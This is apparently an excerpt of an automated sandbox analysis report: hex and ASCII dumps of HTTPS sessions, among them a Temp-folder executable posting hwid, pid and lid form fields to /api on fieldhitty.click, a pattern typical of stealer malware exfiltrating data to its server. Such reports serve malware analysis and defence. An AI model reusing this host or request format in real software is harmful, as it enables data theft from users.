                                                                                                                                                                                                                                                              Data Ascii: ZZnmY6y2WJLyYqv+WEj+ca/7XqD6Mi0F7OX4MiyqS0ycVmEM8OYA7f8A8eUE4fv+QEIB7v8A6fv7Lif8MCoD9d/9NDAJ8NacSkkI6uoH7eKTT0z6Lyf+QYHsQDbGPT+wQUHdNDFiYWP+LCVhXFxcWlpgWl0ugPoLR+pbW1pbWltdW15OVn5fYF1cXVz7LCVcXFxFR5oNQuMLPe1PXVwwQbQQPvsue/QKOvD9Licyhvgug/gAbOY1hPgE7dUA2+o
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC231INData Raw: 59 55 39 4d 6f 6f 30 31 75 6a 31 45 31 66 4f 53 32 57 39 52 6d 4f 6c 55 5a 5a 35 51 52 4d 54 65 48 68 6c 4c 46 4b 6e 72 33 42 49 37 63 6c 47 4e 5a 6e 53 47 76 64 36 4c 4a 57 45 74 57 41 70 6f 77 31 59 45 31 67 38 61 63 4d 32 6c 4a 4d 36 2b 73 59 56 71 76 4c 57 6f 47 7a 73 53 69 48 70 38 64 62 62 67 75 2f 39 59 4c 48 34 61 64 49 69 33 7a 4e 50 75 53 73 48 49 70 79 33 75 2b 38 4e 78 34 6b 4c 36 47 73 62 4a 62 34 63 4c 4f 49 4d 46 61 4e 7a 6c 6b 4e 4d 53 75 48 50 38 6d 71 4b 48 48 42 37 57 59 31 4e 55 52 74 47 71 77 42 55 4a 55 7a 78 71 47 68 47 69 6e 4c 68 6b 73 74 78 62 49 2b 78 35 4d 77 37 35 56 79 4b 6f 2f 56 33 67 63 48 66 77 6a 77 49 5a 50 7a 30 4a 69 79 57 62 57 77 69 4c 53 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: YU9Moo01uj1E1fOS2W9RmOlUZZ5QRMTeHhlLFKnr3BI7clGNZnSGvd6LJWEtWApow1YE1g8acM2lJM6+sYVqvLWoGzsSiHp8dbbgu/9YLH4adIi3zNPuSsHIpy3u+8Nx4kL6GsbJb4cLOIMFaNzlkNMSuHP8mqKHHB7WY1NURtGqwBUJUzxqGhGinLhkstxbI+x5Mw75VyKo/V3gcHfwjwIZPz0JiyWbWwiLS
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC169INData Raw: 61 33 0d 0a 49 65 36 57 47 6b 46 56 4a 71 69 68 78 68 66 50 51 47 70 56 75 77 2f 4d 66 61 65 6f 6f 5a 51 57 39 73 38 36 35 73 46 5a 48 66 7a 6a 69 37 33 41 4b 66 38 55 35 70 36 56 4d 4c 2b 70 6c 45 57 6e 59 58 6c 35 4a 56 33 42 49 56 5a 30 75 32 65 46 53 79 6f 71 62 74 53 32 72 32 53 44 53 4b 61 77 42 6e 48 4c 53 6c 5a 65 39 43 6c 6c 64 70 43 71 38 46 49 64 41 4a 6d 74 6e 6a 4f 4a 6c 31 75 64 34 45 41 4b 79 77 69 6d 34 6c 30 4d 51 57 51 47 71 75 6c 36 75 59 70 7a 6d 35 5a 72 4c 38 75 65 30 57 62 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a3Ie6WGkFVJqihxhfPQGpVuw/MfaeooZQW9s865sFZHfzji73AKf8U5p6VML+plEWnYXl5JV3BIVZ0u2eFSyoqbtS2r2SDSKawBnHLSlZe9ClldpCq8FIdAJmtnjOJl1ud4EAKywim4l0MQWQGqul6uYpzm5ZrL8ue0Wb
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1390INData Raw: 35 34 39 62 0d 0a 33 61 54 68 62 62 6f 6c 70 58 4e 6e 54 6c 2f 64 45 66 51 31 62 49 36 4c 70 65 38 52 44 54 50 4d 39 33 5a 62 58 69 61 5a 68 75 77 6c 64 76 6b 78 4a 50 77 6a 52 58 73 4e 76 4c 59 4b 57 31 4f 75 57 73 52 6a 78 6d 75 4c 39 65 63 31 68 35 73 73 7a 48 39 30 6d 4a 65 2b 57 55 4d 30 36 36 77 6a 6b 59 73 70 4b 71 38 44 64 47 4d 34 78 58 65 4c 4e 5a 74 62 43 49 30 46 55 4f 43 31 4a 58 44 77 68 72 52 56 54 72 2b 50 6a 30 4e 41 5a 50 4b 53 7a 49 59 5a 58 4a 36 6d 42 37 78 34 46 6f 63 2b 45 65 72 39 75 50 68 36 4e 6b 64 51 70 64 6a 63 2f 7a 76 49 78 69 51 56 63 54 33 6a 65 62 64 53 36 54 56 51 6d 4c 47 46 62 4d 43 71 51 72 5a 41 55 72 6a 47 76 59 71 65 6c 52 49 4b 79 59 57 4e 6d 73 65 4a 2f 55 62 75 2b 2f 4e 30 51 69 58 37 6c 44 50 41 69 50 59 62 44
                                                                                                                                                                                                                                                              Data Ascii: 549b3aThbbolpXNnTl/dEfQ1bI6Lpe8RDTPM93ZbXiaZhuwldvkxJPwjRXsNvLYKW1OuWsRjxmuL9ec1h5sszH90mJe+WUM066wjkYspKq8DdGM4xXeLNZtbCI0FUOC1JXDwhrRVTr+Pj0NAZPKSzIYZXJ6mB7x4Foc+Eer9uPh6NkdQpdjc/zvIxiQVcT3jebdS6TVQmLGFbMCqQrZAUrjGvYqelRIKyYWNmseJ/Ubu+/N0QiX7lDPAiPYbD
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1390INData Raw: 58 38 6b 2b 79 62 51 75 73 71 6d 71 32 49 45 4a 6b 4b 38 30 69 77 38 4c 74 39 7a 37 67 41 71 78 37 72 72 47 6c 76 64 65 66 52 50 65 37 71 71 64 48 6f 50 2b 44 42 70 55 58 50 61 38 41 71 71 5a 47 72 54 65 30 71 6c 33 46 64 52 31 36 45 54 69 67 73 36 34 71 67 78 4f 71 4b 55 44 33 66 50 7a 38 50 43 64 59 7a 2f 63 65 79 70 4c 50 77 5a 46 6b 54 6c 31 69 54 54 30 4b 6b 38 64 52 73 50 43 41 51 4a 62 51 77 76 37 65 75 71 77 6f 42 72 49 42 68 36 64 6b 39 34 30 43 57 6e 64 30 54 76 6d 69 51 75 6f 70 55 49 57 38 49 56 67 64 2f 6a 47 68 46 4d 2f 7a 6b 79 6a 4a 65 4a 74 77 5a 4c 36 79 6e 74 37 56 33 59 4d 57 30 4a 4f 38 78 5a 4d 46 56 6f 46 31 42 31 67 4a 47 4c 44 53 57 6a 46 6a 4a 68 47 56 68 73 53 70 32 56 52 64 58 6e 41 48 42 47 76 44 66 51 6b 74 6b 7a 59 4b 56 4d
                                                                                                                                                                                                                                                              Data Ascii: X8k+ybQusqmq2IEJkK80iw8Lt9z7gAqx7rrGlvdefRPe7qqdHoP+DBpUXPa8AqqZGrTe0ql3FdR16ETigs64qgxOqKUD3fPz8PCdYz/ceypLPwZFkTl1iTT0Kk8dRsPCAQJbQwv7euqwoBrIBh6dk940CWnd0TvmiQuopUIW8IVgd/jGhFM/zkyjJeJtwZL6ynt7V3YMW0JO8xZMFVoF1B1gJGLDSWjFjJhGVhsSp2VRdXnAHBGvDfQktkzYKVM
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1390INData Raw: 53 69 66 68 4f 42 56 4c 4e 55 53 65 2b 59 58 46 78 63 57 6c 63 39 33 57 34 56 6f 50 6c 79 78 56 71 39 56 61 4b 2b 52 37 69 67 58 32 53 4e 63 72 68 77 65 47 49 59 38 33 4f 69 56 2f 2b 34 78 69 57 52 6d 64 6a 75 47 39 59 6d 4d 4a 56 6e 2b 42 61 6b 58 4e 69 71 58 4d 51 6d 59 31 48 77 7a 52 4c 48 45 39 69 6f 64 43 6d 6c 68 59 4e 68 43 58 49 6d 54 42 63 75 45 61 66 31 68 44 56 69 77 4d 4c 42 52 4c 44 51 77 48 6f 53 4a 66 67 6c 65 45 69 36 72 4f 6a 42 6b 39 68 53 49 71 4a 61 56 61 4b 6e 4c 70 37 65 74 56 33 5a 41 49 7a 73 78 53 57 4a 39 62 49 62 42 41 4c 4c 34 59 72 64 63 4d 58 6f 69 72 7a 46 79 6c 69 56 77 73 62 32 62 30 6f 73 67 53 4c 56 6b 79 4e 56 62 72 69 67 58 59 37 44 5a 79 6f 30 50 56 49 6c 37 74 74 75 41 6b 46 4b 39 59 51 37 45 55 75 55 53 6b 75 6e 7a
                                                                                                                                                                                                                                                              Data Ascii: SifhOBVLNUSe+YXFxcWlc93W4VoPlyxVq9VaK+R7igX2SNcrhweGIY83OiV/+4xiWRmdjuG9YmMJVn+BakXNiqXMQmY1HwzRLHE9iodCmlhYNhCXImTBcuEaf1hDViwMLBRLDQwHoSJfgleEi6rOjBk9hSIqJaVaKnLp7etV3ZAIzsxSWJ9bIbBALL4YrdcMXoirzFyliVwsb2b0osgSLVkyNVbrigXY7DZyo0PVIl7ttuAkFK9YQ7EUuUSkunz
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1390INData Raw: 66 66 76 58 74 44 50 69 64 57 76 58 76 33 47 72 31 53 33 4c 48 65 33 79 6d 76 7a 4c 67 61 56 59 41 34 4a 33 4d 75 44 45 78 4e 74 64 2b 6a 63 57 73 66 41 47 36 37 71 6a 64 6b 78 50 4c 63 38 7a 41 5a 4a 62 47 79 2b 71 5a 4c 48 57 4f 62 32 30 4a 42 72 4b 2f 78 36 51 5a 65 72 43 63 76 6a 78 35 31 4f 4b 68 59 46 76 6a 79 4d 4d 7a 42 35 74 4b 39 6a 56 67 66 6e 76 6e 66 49 65 69 56 51 6d 4b 39 66 2f 2f 78 34 38 64 50 34 63 44 4b 74 57 71 73 41 58 79 31 56 53 37 5a 6e 6d 72 77 39 55 71 57 67 72 55 2f 73 55 51 74 46 74 6d 77 64 44 6b 6c 73 53 71 74 69 59 56 39 51 32 50 4a 6e 43 43 41 56 6b 31 58 4f 6e 57 7a 44 72 34 6b 57 47 79 4f 53 43 4f 77 69 46 55 45 4b 4e 31 6c 76 43 4a 69 6a 62 37 78 76 30 61 76 77 75 69 56 62 47 4a 39 35 4c 6e 74 38 7a 39 65 6d 56 71 4e 69
                                                                                                                                                                                                                                                              Data Ascii: ffvXtDPidWvXv3Gr1S3LHe3ymvzLgaVYA4J3MuDExNtd+jcWsfAG67qjdkxPLc8zAZJbGy+qZLHWOb20JBrK/x6QZerCcvjx51OKhYFvjyMMzB5tK9jVgfnvnfIeiVQmK9f//x48dP4cDKtWqsAXy1VS7Znmrw9UqWgrU/sUQtFtmwdDklsSqtiYV9Q2PJnCCAVk1XOnWzDr4kWGyOSCOwiFUEKN1lvCJijb7xv0avwuiVbGJ95Lnt8z9emVqNi
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1390INData Raw: 34 48 49 59 4e 64 46 77 6c 69 56 61 38 37 57 76 4b 6a 63 31 6b 72 4b 6c 70 34 6e 45 74 4e 52 79 61 68 6b 4c 79 49 4c 6d 6e 66 56 59 6d 66 46 4b 72 6a 49 41 31 6d 6c 65 43 57 75 4e 73 53 42 73 51 6b 72 4b 75 72 74 4d 5a 42 6e 43 57 69 36 56 78 6b 34 4d 2f 71 67 6d 56 78 6a 77 46 56 43 6c 35 69 50 5a 76 39 78 44 73 75 35 6f 64 57 53 6a 61 4f 34 4b 73 47 35 6f 4a 69 32 35 6e 67 42 59 75 57 74 72 2f 34 51 2f 4a 35 49 4e 4f 78 51 47 31 72 72 58 72 55 56 32 6b 69 76 75 4b 36 79 42 4a 43 75 76 73 77 75 57 46 78 59 47 79 4e 49 2f 6f 55 4f 6b 30 59 31 4c 55 7a 58 47 42 35 39 65 47 70 61 61 7a 4c 44 34 2f 72 61 35 4d 6c 2f 53 51 62 42 77 33 44 42 4c 6c 52 41 34 6f 6d 42 42 7a 49 7a 50 7a 56 31 46 72 73 78 37 33 76 6d 4c 51 71 71 46 6c 57 51 70 79 78 52 64 57 48 41
                                                                                                                                                                                                                                                              Data Ascii: 4HIYNdFwliVa87WvKjc1krKlp4nEtNRyahkLyILmnfVYmfFKrjIA1mleCWuNsSBsQkrKurtMZBnCWi6Vxk4M/qgmVxjwFVCl5iPZv9xDsu5odWSjaO4KsG5oJi25ngBYuWtr/4Q/J5INOxQG1rrXrUV2kivuK6yBJCuvswuWFxYGyNI/oUOk0Y1LUzXGB59eGpaazLD4/ra5Ml/SQbBw3DBLlRA4omBBzIzPzV1Frsx73vmLQqqFlWQpyxRdWHA
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1390INData Raw: 4d 36 47 6f 2b 6e 42 62 43 47 53 46 6d 34 64 51 62 49 75 6a 55 2b 41 31 77 74 59 6f 7a 62 6f 4a 47 72 79 33 69 52 30 50 70 4e 6a 4b 71 56 35 52 4d 6a 42 35 4a 57 2f 37 4a 36 4e 7a 6f 32 45 59 2f 30 45 31 62 6c 2f 6f 70 6d 37 69 33 66 2f 67 7a 4e 4f 2b 71 71 57 47 51 37 53 42 4e 74 44 67 72 38 36 2b 56 38 76 62 36 76 45 43 6e 73 73 4c 43 49 71 79 34 6e 4e 6c 4e 59 42 41 56 57 63 45 44 38 75 45 53 41 4c 5a 39 67 43 37 68 79 32 59 33 6e 71 62 49 56 6a 57 32 61 6a 50 58 70 6c 4e 53 78 42 44 59 43 34 55 49 38 48 73 6b 32 43 52 5a 31 57 59 77 73 54 43 61 44 56 47 45 57 4d 38 53 56 41 4d 76 4d 6c 64 6c 59 4a 6d 55 78 74 50 6f 6a 79 79 6b 41 53 6c 44 46 75 45 4b 77 4d 4d 52 56 4b 32 54 4a 31 31 63 30 62 65 55 47 59 6b 56 67 68 56 57 31 7a 65 37 49 37 67 7a 34 58
                                                                                                                                                                                                                                                              Data Ascii: M6Go+nBbCGSFm4dQbIujU+A1wtYozboJGry3iR0PpNjKqV5RMjB5JW/7J6Nzo2EY/0E1bl/opm7i3f/gzNO+qqWGQ7SBNtDgr86+V8vb6vECnssLCIqy4nNlNYBAVWcED8uESALZ9gC7hy2Y3nqbIVjW2ajPXplNSxBDYC4UI8Hsk2CRZ1WYwsTCaDVGEWM8SVAMvMldlYJmUxtPojyykASlDFuEKwMMRVK2TJ11c0beUGYkVghVW1ze7I7gz4X


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              58192.168.2.450254104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=39L416L3976CCY2K5I
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20432
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC15331OUTData Raw: 2d 2d 33 39 4c 34 31 36 4c 33 39 37 36 43 43 59 32 4b 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 39 4c 34 31 36 4c 33 39 37 36 43 43 59 32 4b 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 39 4c 34 31 36 4c 33 39 37 36 43 43 59 32 4b 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 33
                                                                                                                                                                                                                                                              Data Ascii: --39L416L3976CCY2K5IContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--39L416L3976CCY2K5IContent-Disposition: form-data; name="pid"3--39L416L3976CCY2K5IContent-Disposition: form-data; name="lid"PvbArZ----3
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:00 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=qu0jpnm9n525sgn4mmvs1uar9c; expires=Wed, 16 Apr 2025 19:05:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m3yhtTatDJoLjR4IpzWq9tooUUv%2FnjxZxWo%2Bs84GkQQL1XWYsSd70DNMeg%2BGOFZEDSzFg0L5bjE9y8wI24OSD1ubekKv%2BBZprIo5WArvFV6%2BfQBs2b4uHghknxpp9QCSXxpC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47f93ccb7274-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1817&rtt_var=688&sent=19&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21394&delivery_rate=1583514&cwnd=182&unsent_bytes=0&cid=93e8e73b1ebd7a4b&ts=1108&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              59192.168.2.450256172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:01 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:02 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-n6zPIw9WXGjwJeV60JLRiA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC124INData Raw: 38 31 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 65 77 20 73 70 65 63 69 65 73 20 64 69 73 63 6f 76 65 72 65 64 20 70 65 72 75 22 2c 22 7a 6f 64 69 61 63 20 73 69 67 6e 73 20 64 61 69 6c 79 20 68 6f 72 6f 73 63 6f 70 65 20 74 6f 64 61 79 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 73 61 6e 20 64 69 65 67 6f 20 69 6e 74 65 72 6e 61 74 69 6f 6e 61
                                                                                                                                                                                                                                                              Data Ascii: 81d)]}'["",["new species discovered peru","zodiac signs daily horoscope today","college football","san diego internationa
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 6c 20 61 69 72 70 6f 72 74 20 64 65 6c 61 79 73 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 77 69 6e 20 72 61 74 65 73 22 2c 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 6f 70 65 6e 61 69 20 6f 33 20 6d 69 6e 69 22 2c 22 6d 6c 62 20 6d 65 74 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69
                                                                                                                                                                                                                                                              Data Ascii: l airport delays","marvel rivals win rates","nyt crossword clues","openai o3 mini","mlb mets"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetai
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC570INData Raw: 31 53 31 5a 75 63 44 67 32 62 55 5a 7a 64 57 70 74 4e 48 5a 76 55 56 5a 43 4e 56 4e 36 4d 33 52 77 4d 55 56 4e 54 31 63 31 64 47 4e 74 65 48 4e 6a 53 48 46 4e 65 48 46 76 65 47 31 42 4c 31 64 45 64 56 6c 6f 56 48 4e 6e 61 6d 39 35 56 31 46 75 56 48 45 79 53 48 68 43 63 6a 6c 50 4d 58 6f 30 64 30 74 76 63 54 4e 70 62 33 42 33 53 48 70 6f 64 6e 45 35 56 48 52 45 65 6d 63 7a 51 54 46 42 51 57 63 34 56 47 55 31 51 58 64 55 54 33 42 49 63 44 52 68 62 58 46 68 56 45 39 35 63 6b 4e 4e 4f 45 4e 71 61 6a 46 4e 62 57 73 79 53 56 68 79 4d 54 46 59 55 44 6c 4b 4e 31 6c 46 55 47 4a 51 5a 58 6b 35 56 6c 64 57 61 32 4e 73 56 32 59 78 62 33 6c 78 64 47 52 46 63 55 74 73 53 48 49 77 53 6c 6c 46 63 48 52 6a 62 53 38 7a 61 6d 46 34 65 48 46 61 55 6b 70 4f 53 7a 6c 6a 57 6e
                                                                                                                                                                                                                                                              Data Ascii: 1S1ZucDg2bUZzdWptNHZvUVZCNVN6M3RwMUVNT1c1dGNteHNjSHFNeHFveG1BL1dEdVloVHNnam95V1FuVHEySHhCcjlPMXo0d0tvcTNpb3B3SHpodnE5VHREemczQTFBQWc4VGU1QXdUT3BIcDRhbXFhVE95ckNNOENqajFNbWsySVhyMTFYUDlKN1lFUGJQZXk5VldWa2NsV2Yxb3lxdGRFcUtsSHIwSllFcHRjbS8zamF4eHFaUkpOSzljWn
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC88INData Raw: 35 32 0d 0a 77 4e 6c 52 4f 53 56 70 72 63 48 41 78 56 55 38 32 62 44 4a 4b 63 30 35 35 63 45 74 6f 63 6b 52 73 64 57 59 35 57 54 56 4d 53 45 35 46 63 6e 63 72 62 48 70 78 59 55 31 56 54 58 45 32 4d 47 35 54 65 6d 30 31 52 6e 4a 47 5a 32 56 4a 55 6e 56 45 57 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 52wNlROSVprcHAxVU82bDJKc055cEtockRsdWY5WTVMSE5FcncrbHpxYU1VTXE2MG5Tem01RnJGZ2VJUnVEW
